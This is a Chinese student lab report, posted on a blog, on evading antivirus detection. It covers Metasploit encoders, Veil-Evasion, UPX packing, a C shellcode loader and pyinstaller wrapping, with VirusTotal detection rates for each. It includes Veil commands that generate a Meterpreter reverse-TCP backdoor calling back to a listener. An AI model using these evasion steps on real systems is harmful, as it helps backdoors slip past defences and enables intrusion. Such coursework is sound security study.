首页 > 其他分享 >Exp3:免杀原理

Exp3:免杀原理

时间:2023-03-30 22:34:08浏览次数:52  
标签:免杀 Exp3 检测 py 使用 恶意代码 原理 veil

目录

一.实验信息

  • 课程名称:网络对抗技术
  • 实验序号:3
  • 实验名称:免杀原理
  • 实验人:20201207徐艺铭

二.实验内容

2.1 实验内容

2.1.1 方法(分)

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件(1分),
  • veil,加壳工具(1分),
  • 使用C + shellcode编程(1分),

2.1.2 通过组合应用各种技术实现恶意代码免杀(1分)

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

2.1.3 附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分1)

2.2 报告要求

  • 报告整体观感
    (1)报告格式范围,版面整洁 加1分。
    (2) 报告排版混乱,加0分。

  • 文字表述
    (1)报告文字内容全面,表述清晰准确 加1分。
    (2)报告表述不清或文字有明显抄袭可能 加0分。

  • 截图要求:

    (1) 所有操作截图主机名为本人姓名拼音。
    (2) 所编辑的文件名包含自己的学号。

三.实验知识

3.1 免杀

免杀,也就是病毒与反间谍的对立面,英文为Anti-AntiVirus(简写Virus AV),翻译为“反杀毒技术”。
这是一种能使病毒木马免于被杀毒软件查杀的技术。
由于免杀技术涉及到很多方面,包括反汇编、逆向工程、系统漏洞等技术,难度很高,所以本篇文章内容基本上都是修改病毒、木马的内容改变特征码,从而躲避杀毒软件的查杀。

3.2 veil evasion

veil-evasion是linux平台的一款免杀工具,可直接通过apt-get安装,用来生成msf的payload,能绕过常见的杀软
Veil-Evasion 是一个用 Python 编写的免杀框架,专门为攻击安全测试过程中免杀使用的工具,它可以将任意脚本或一段 Shellcode 转换成 Windows 可执行文件,从而逃避常见防病毒产品的检测。Veil 2.0 于 2013 年 6 月 17 日公开使用,自那时以来,核心框架基本上保持不变。对框架本身进行了一些修改,大部分修改涉及对新编程语言和新有效负载模块的支持。

3.3 实验检测平台

https://www.virustotal.com/gui/file/48f741b39f98a170765285529705bb797cde0e94b573cbbe48529836aed5e7a9?nocache=1

四.实验过程

4.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

4.1.1 直接将实验2生成的可执行文件使用VirusTotal检测,可以看到是53/68,检测率很高

  • 使用unicode进行一次编码

  • 检测率没什么变化(54/69)

4.1.2 使用unicode编码7次(-i 编码次数)

  • 编码次数越多越慢,基本上是大小时间成倍增加

  • 检测率基本不变(51/69)

4.1.3生成php格式文件和jar文件

  • 生成php格式文件

  • 检测结果下降很多

  • 生成jar文件

  • 检测结果同样下降不少

4.2 使用veil和加壳工具

4.2.1 veil-evasion的安装

  • 使用命令sudo apt-get install veil-evasion准备安装

  • 输入cd /usr/share/veil/configvim setup.sh,找到图1中的内容修改成图2

图1


图2

  • 修改成功后veil等待安装

  • 经过漫长的等待时间和提示安装需要的软件,终于完成(这里它会弹出不同软件的提示框我们只要一步一步跟着装即可,如果出现方块字符,一般选项会有蓝框框指引我们选择正确的选项)

4.2.2 使用veil和加壳工具降低检出率

  • 使用use evasion进入环境

  • 使用如下命令

use c/meterpreter/rev_tcp.py
set LHOST [Kali ip]
set LPORT 1207
generate
201207_veil(自己设置的文件名)

  • 终端自动输出的内容中找到文件存放的位置

  • exe文件检测结果(37/69)

  • 使用upx加壳命令

  • 检测结果不降反升(41/69),杀软对于加壳还是敏感度很高的

4.3 使用C + shellcode编程

  • 在终端中使用如下命令生成c语言的shellcode

  • 得到下图shellcode

  • vim shellcode1207_c.c,将刚刚得到的shellcode复制进去,同时再加一行内容,如图

  • 保存c文件后编译为可执行文件,使用命令i686-w64-mingw32-g++ shellcode1207_c.c -o shellcode1207_c.exe

  • 将生成的可执行文件拉去检测,检出率同样中等(33/69)

4.4 通过组合应用各种技术实现恶意代码免杀(py+exe)

4.4.1 尝试一(生成py后直接生成exe文件)

  • 使用如图命令先生成py文件

  • 检测py文件,检出率下降(21/58)

  • windows中使用命令py install pyinstaller安装pyinstaller工具

  • 在windows包含刚刚py文件的文件夹下,使用命令pyinstaller -F shell_1207.py将py文件转化为可执行文件,可以看到当前文件夹中有一个dist文件夹,点开里面放着生成的可执行文件

  • 拖去检测,检出率虽然比较低但是跟心理预期有很大差距(16/68)

  • 不死心,使用windows点开可执行文件,同时kali机提前设置好监听,获取权限失败,显示died T.T

4.4.2 尝试二(生成raw格式装入.py文件中)

  • 使用下图命令

  • 检测(11/59)感觉还可以,但是转为exe文件的时候报错,后期会继续尝试解决报错问题继续检测!

4.5 附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

五.基础问题回答

杀软是如何检测出恶意代码的?

  • 检测特征码
    人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。
  • 启发式恶意软件检测
    如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。
  • 基于行为检测
    与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代码运行过程,如利用系统监视工具观察恶意代码运行过程时系统环境的变化,或通过跟踪恶意代码执行过程使用的系统函数和指令特征分析恶意代码功能,如出现恶意行为,则属于恶意代码。

免杀是做什么?

  • 免杀就是去除恶意代码的特征,使其绕开杀软的检测,免于查杀
    免杀就是反病毒技术,它指的是一种使病毒木马免于被杀软查杀的技术,由于免杀技术的涉猎范围非常广,其中包含反会变、逆向工程、系统漏洞等和可技术,所以难度很高,其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

免杀的基本方法有哪些?

  • 自捆绑+多次编码
  • evasion免杀
  • backdoor factory

开启杀软能绝对防止电脑中恶意代码吗?

  • 道高一尺魔高一丈,杀软不能绝对防止恶意代码。

六.实验总结体会

  • 在本次实验中,没有固定的流程格式,有的只是想办法包装自己的后门程序逃脱免杀,所以方式很具有多样化,不过通过这段时间的实践下来,我觉得最有望逃脱免杀的是综合利用py文件和其他工具的办法(虽然我这里没能成功躲过杀软回弹连接,但感觉它的效果是最好的)。
  • 实验中有同学完成了免杀,这说明我们用不太复杂的手段应该就可以躲过AV软件的检测,更加说明了在信息时代植入后门获取权限之易,未来会检查自己的电子设备是否存在可疑进程使用端口,是否有其他不知名用户获得了不该获得的权限,一是避免自己的信息称为透明化存在,而是避免自己的电子设备称为别人发起进攻的肉鸡。
  • 接下来一段时间也会继续免杀的试验研究!!

标签:免杀,Exp3,检测,py,使用,恶意代码,原理,veil
From: https://www.cnblogs.com/yao-yuer/p/17258882.html

相关文章

  • Exp3-免杀原理
    Exp3-免杀原理目录1、基础问题回答1.1杀软检测出恶意代码的原理1.1.1基于特征码1.1.2利用启发式恶意软件1.1.3基于行为1.2什么是免杀1.3免杀的基本方法1.3.1改变特征码1.3.2改变行为1.4杀软不能绝对保证电脑安全二、实验内容......
  • MSF实战免杀过静态:ShellCode加花指令
    分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中......
  • 《网络对抗技术》——Exp3 免杀原理与实践
    目录一、实践内容1.2实践内容1、免杀2、恶意软件检测机制启发式恶意软件检测3、加壳二、实践过程记录1、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil1、安装veil2、使用Veil生成后门文件3、使用C+shellcode编程4、加壳工具——压缩壳工具UPX5、加壳工具——加......
  • HCIP-ICT实战进阶10-BFD原理与配置
    HCIP-ICT实战进阶10-BFD原理与配置0引言之前学习的比如链路聚合、STP、RSTP、MSTP以及一些路由协议,所有的协议都可以实现一种能力:冗余备份网络中如果真的发生了设备的故障或者是链路故障,则以上的各种协议需要检测到故障,然后进行网络的链路切换.生成树协议发生故障生成树......
  • Exp3-免杀原理
    目录一、基础问题回答1、杀软是如何检测出恶意代码的?2、免杀是做什么的?3、免杀的基本方法有哪些?4.开启杀软能绝对防止电脑中恶意代码吗?二、实践过程记录1、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件1.1得到kali的ip地址192.168.136.1291.2检验直接生成的后门exe文......
  • Exp3-免杀原理 实验报告—20201229赵斌
    免杀原理与实践基础问题回答Q1:杀软是如何检测出恶意代码的?(1)基于特征码的检测特征码是一段或多段数据,如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特......
  • 原理和解决
          ......
  • 网络对抗实验三 免杀原理与实践
    目录《网络对抗技术》——Exp3免杀原理与实践1.1实践目标1.2基础知识任务一:正确使用免杀工具或技巧1.正确使用msf编码器2.msfvenom生成如jar之类的其他文件3.使用veil-e......
  • MobTech MobLink|场景分享的原理
    MobLink场景分享的原理是基于深度链接(Deeplinking)的技术,即在Web和App之间建立一个可跟踪的链接,可以携带参数和状态信息,实现从Web到App的无缝跳转和场景还原。深度链接有两种......
  • Exp3-免杀原理
    一、基础问题回答1.杀软是如何检测出恶意代码的?杀软检测恶意代码共有三种方法:1.基于特征码的检测。简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分......